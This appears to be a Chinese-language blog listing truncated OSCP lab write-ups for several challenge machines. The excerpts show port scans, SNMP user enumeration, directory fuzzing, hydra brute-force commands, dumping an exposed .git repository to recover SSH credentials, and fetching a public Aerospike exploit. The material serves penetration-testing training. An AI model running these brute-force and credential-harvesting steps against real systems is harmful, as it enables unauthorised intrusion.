ARIES

 Challenge 4 -  Hermes 起手式 └─$ rustscan -a 192.168.244.145 --scripts none --ulimit 5000 | tee rustscan └─$ sudo nmap -sVC -p 21,80,135,139,445,1978,3389,7680 192.168.244.145 | tee nmap 21-FTP、80-Web、1978-?、7680 └─$ sudo nmap -sU -p 161 192.168.244.145 | tee nmap-snmp  結果 SNMP 161 有開，又是 Windows，那就馬上列舉一下使用者，有用的三個  - Administrator  - offsec - zachary 紀錄一下 Web Type└─$ whatweb http://192.168.244.145 | tee whatweb    網頁開啟來看一下，這裡可以輸入但事實上沒有用因為連 POST 都沒有 gobuster，└─$ gobuster -w dirfuzzing.txt dir -u http://192.168.244.145 -t 150 -x txt,pdf,config,git,php,aspx | tee gobuster，結果逛了一圈也沒戲 有使用者，有 FTP、SMB、RDP，當然試試看 hydra，結果一樣都沒有破 └─$ hydra -L ./usernames.txt -p /usr/share/wordlists/rockyou.txt -s 21 ftp://192.168.244.145 └─$ hydra -L ./usernames.txt -p /usr/share/wordlists/rockyou.txt -s 22 rdp://192.168.244.145 └─$ hydra -L ./usernames.txt -p /usr/share/wordlists/rockyou.txt -s 445 smb://192.168.244.145 這跑很久......官方有說 10 分鐘沒出來就絕對不是答案，所以跳過繼續列舉，換一個 nmap 的腳本再試試看，└─$ su...

 Challenge 4 -  Crystal rustscan 先，└─$ rustscan -a 192.168.228.144 --scripts none --ulimit 5000 | tee rustscan 只有三個 Port 192.168.228.144 -> [21,22,80] sudo nmap -sC -sV -p 21,22,80 -oN nmap 192.168.243.144  - 21 : ftp  - 22 : ssh  - 80 : http 測試 snmp 是否有開 └─$ sudo nmap -sU -p 161 192.168.229.144 | tee nmap-snmp └─$ whatweb http://192.168.229.144 JQuery, MetaGenerator[Nicepage 4.21.12, nicepage.com] 逛一下網站，下面有一塊可以輸入資料與送出，最終測試了一下是個兔子坑 因為根本不會真的送出 post，做得相當賊的網站 gobuster 列舉網站目錄，└─$ gobuster -w dirfuzzing.txt dir -u http://192.168.228.144 -t 150 -x txt,pdf,config,git,php,aspx ，號稱 OSCP 考試最佳 gobuster 列舉檔 : oscp/wordlists/dirfuzzing.txt at master · ferreirasc/oscp · GitHub 有個 .git，看來有戲，先安裝 git-dumper， sudo pip install git-dumper 執行 git-dumper， git-dumper http://192.168.228.144/.git ~/website-144 預設存放路徑在現有使用者的 home 目錄 第一個檔案是 [-] Testing http://192.168.228.144/.git/HEAD [200] 讓我們直接看該檔案  git show HEAD，發現帳號密碼 stuart:BreakingBad92 └─$ ssh stuart@192.168.228.144 id...

Challenge 4 -  Aero └─$ rustscan -a 192.168.205.143 --scripts none --ulimit 5000 | tee rustscan └─$ sudo nmap -sVC -p 21,22,80,81,443,3000,3001,3003,3306,5432 192.168.205.143 | tee nmap 當中較為特別的是 3000、3001、3003，依據這一篇文章 https://docs.aerospike.com/server/operations/plan/network  判定應為 Aerospike 開放的典型連接埠： 3000 -“服務”端口，處理客戶端請求和回應。 3001 -“fabric”端口，處理伺服器節點到節點的通訊。 3002 -“心跳”連接埠 -（可選）用於心跳 TCP 訊息。 3003 -“info”端口，這是一個可用於 Aerospike info 命令的 telnet 連接埠。 3004 - 'xdr' 端口，由舊版 xdr 守護程序用來與主 Aerospike 守護程序進行通訊。 持續枚舉後透過 gobuster 在這個網址 "http://192.168.205.143/api/heartbeat.php" 可以清楚看到 Aerospike 字眼 └─$ searchsploit Aerospike，結果只有一個 49067 ，那就直接試試看吧                                                   └─$ searchsploit -m 49067 直接先執行看看 └─$ python3 49067.py 錯誤訊息是 ModuleNotFoundError: No module named 'aerospike' 看看內容  https://www.exploit-db.com/exploits/49067   寫...

Challenge 4 -  AD 對外的機器 192.168.244.141，第一步先 rustscan └─$ rustscan -a 192.168.244.141 --scripts none --ulimit 5000 | tee rustscan 測試 snmp 沒開 └─$ sudo nmap -sU -p 161 192.168.244.141        nmap 查找開放的 Port 相關資訊，└─$ sudo nmap -sVC -p 22,81,80,135,139,445,3306,3307,5040,5985,47001,49664,49665,49666,49667,49668,49669,49670,50763 192.168.244.141 | tee nmap 有用的幾個資訊如下 22/tcp    open  ssh             OpenSSH for_Windows_8.1 (protocol 2.0) 80/tcp    open  http            Apache httpd 2.4.51 ((Win64) PHP/7.4.26) 81/tcp    open  http            Apache httpd 2.4.51 ((Win64) PHP/7.4.26) 135/tcp   open  msrpc           Microsoft Windows RPC 139/tcp   open  netbios-ssn     Microsoft Windows netbios-ssn 445/tcp   open  microsoft-ds? 3306/tcp  open...